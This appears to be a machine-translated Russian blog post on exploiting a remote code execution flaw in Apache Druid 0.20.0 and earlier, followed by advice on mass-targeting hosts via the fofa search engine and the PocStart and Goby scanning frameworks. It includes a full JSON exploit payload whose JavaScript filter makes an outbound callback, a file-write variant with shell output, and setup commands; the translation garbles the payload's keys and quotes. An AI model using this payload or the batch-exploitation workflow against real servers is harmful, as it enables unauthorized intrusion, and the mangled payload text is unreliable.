Автоматическое обнаружение и эксплуатация удаленного выполнения кода уязвимости ApacheDruid

I Знакомство с уязвимостью

Apache Druid включает в себя возможность выполнять предоставленный пользователем код JavaScript, встроенный в различные типы запросов. Эта функция предназначена для использования в средах с высоким уровнем доверия и по умолчанию отключена. Однако в Druid 0.20.0 и более ранних версиях аутентифицированный пользователь может отправить специально созданный запрос, который заставляет Druid выполнять предоставленный пользователем код JavaScript для этого запроса, независимо от конфигурации сервера. Это можно использовать для выполнения кода на целевой машине с привилегиями серверного процесса Druid.

Развертывание среды II

https://druid.apache.org/docs/latest/tutorials/index.html
wget https://downloads.apache.org/druid/0.19.0/apache-druid-0.19.0 -bin.tar.gz
tar -zxvf apache-druid-0.19.0-bin.tar.gz
cd apache-druid-0.19.0-bin
./bin/start -микро-быстрый старт

III Обнаружение и использование уязвимостей

Для уязвимости: когда целевая машина может подключиться к Интернету, вы можете использовать обратное подключение к своему http-серверу, а затем проверить журнал доступа.

Полезная нагрузка:

{«тип»: «индекс», «спецификация»: {«ioConfig»: {«тип»: «индекс», «входной источник»: {«тип»: «встроенный», «данные»: «{\ ”isRobot\”:true,\”канал\”:\”#x\”,\”отметка времени\”:\”2021–2–1T14:12:24.050Z\”, \”флаги\”:\”x \",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://www.google.com\",\'added\':1 ,\'comment\':\'Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous \”:true,\”user\”:\”Lsjbot\”,\”deltaBucket\”:0,\”deleted\”:0,\”namespace\”:\”Main\”}”}, “inputFormat ": {"тип": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": " iso»}, «dimensionsSpec»: {}, «transformSpec»: {«преобразования»: [], «фильтр»: {«тип»: «javascript», «измерение»: «добавлено», «функция»: «функция (значение) {java.net.URL(\"http://localhost:9898\')}', "": {"enabled": true}}}}, "type": "index", "tuningConfig" : {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

Если целевая машина не может подключиться к Интернету, вы можете записать файл в директорию www, чтобы получить к нему доступ, но я не знаю, какой каталог подходит для записи файлов? Если вы знаете, пожалуйста, сообщите мне :)
function(value) {java.io.PrintWriter(\"flag.txt\")}
flystart@flystart-virtual-machine:~/apache-druid/apache-druid-0.19.0$ find ./ -name «flag.txt»|xargs ls -al
-rw-r — r — 1 flystart flystart 0 2月 5 11:11 ./flag.txt

Автоматизация оружия Красной команды IV

Иногда нам нужно просканировать большое количество целей через поисковые системы для тестирования и исследования. Кто-то в Интернете провел ранжирование и сравнение поисковых систем, обычно используемых исследователями безопасности. Я думаю, что это не объективно и не хватает того, что очень полезно и очень добросовестно. Поисковик fofa платит один раз за постоянное использование, и цена очень дешевая. Количество запросов не ограничено. Обычные участники могут каждый раз запрашивать 10 000 фрагментов данных, что вполне достаточно для исследования безопасности. Я часто использую его, чтобы помочь мне найти цель при выполнении бонусных проектов проникновения и уязвимости.

Я использовал C/C++ для написания инструмента для автоматического сканирования результатов поиска. На github есть много клиентов python, вы можете найти их

После получения большого количества целевых URL пишем poc и exp. В Интернете существует множество сред с открытым исходным кодом для сканирования и использования уязвимостей. Я использовал pocsuite и poc-t в первые дни. У них есть свои особенности, но есть и свои недостатки. Теперь для всех Рекомендую два фреймворка для обнаружения и эксплуатации уязвимостей, один очень легкий, разработанный мной.

PocStart (https://github.com/ggg4566/PocStart)

Другой мощный инструмент — бычок (https://gobies.org/).

PocStart — это облегченный фреймворк для обнаружения и эксплуатации уязвимостей. Он поддерживает Python 2 и Python 3. Рекомендуется использовать python3. Его преимущество в том, что он с открытым исходным кодом и легкий. Код составляет всего более двухсот строк и может быть изменен в соответствии с потребностями. Недостаток в том, что не так много poc. Goby — мощный инструмент для тестирования на проникновение. Он и fofa принадлежат одной и той же охранной компании. Основателем этой компании является известный хакер Zwell, который в первые дни разработал множество полезных инструментов безопасности, поэтому этот инструмент полностью разработан в соответствии с хакерским мышлением. Идентификация баннера и обнаружение уязвимостей интегрированы с более чем двумя сотнями встроенных элементов, что является единственным артефактом тестирования на проникновение, и оно все еще находится в итеративной разработке.

Далее я буду использовать эти два фреймворка для обнаружения и использования уязвимостей для множества целей.

Во-первых, поговорим о PocStart, Poc очень просто написать. Вам нужно только реализовать две функции: def verify(target_node) и def Attack(target_node). Verify обнаруживает уязвимости и атаки используют уязвимости.
target_node is dics
node = {'target':'','port':'','param':''}, target и port не нужны быть объяснено. Всем понятно, что param передается при эксплуатации уязвимости, такой как загрузка файла с именем уязвимого файла, выполнение команды командой и т.д.

Демо:

Обнаружение и использование этой уязвимости очень просто. Я не буду подробно объяснять это здесь. Пожалуйста, прочтите код.

Далее, давайте сосредоточимся на бычке

Poc пишется двумя вкладками. Эксплойт — это описание уязвимости и некоторая другая информация. Правило запроса — это поле, на котором нужно сосредоточиться. Goby сначала идентифицирует веб-приложение при сканировании порта. Если он будет идентифицирован, он вызовет poc для сканирования, поэтому здесь обязательно напишите его правильно, вы можете прочитать справку справа для заполнения.

Заполнить вкладку Test важно для poc.

После заполнения вы можете отправить и Sing Ip Scan test

Poc сохраняется в каталоге \golib\exploits\user и может быть изменен в бычке или напрямую, открыв редактор.

Эксплойт не может быть отредактирован непосредственно в бычке. Пользователи сети делают это, изменяя файл poc. Это немного хлопотно. После того, как я изменю poc на основе онлайн-информации, poc не сможет загрузиться. Я не буду записывать это здесь. Я дам справочную статью для вашего собственного исследования.

https://mp.weixin.qq.com/s/J1JW66Uh_6Nc0x2YY_5V6Q

С точки зрения пакетного обнаружения, поскольку бычок был разработан в соответствии с процессом тестирования на проникновение, первым шагом является обнаружение и сбор активов, поэтому встроенный poc и ваш собственный poc нельзя использовать без сканирования целевого порта, и вы можете установить его в магазине плагинов

Плагин создает пустую задачу сканирования для пакетного импорта цели для poc-сканирования.

После завершения задачи сканирования вы можете увидеть результаты. Goby автоматически сохранит результаты. Другие способы игры здесь.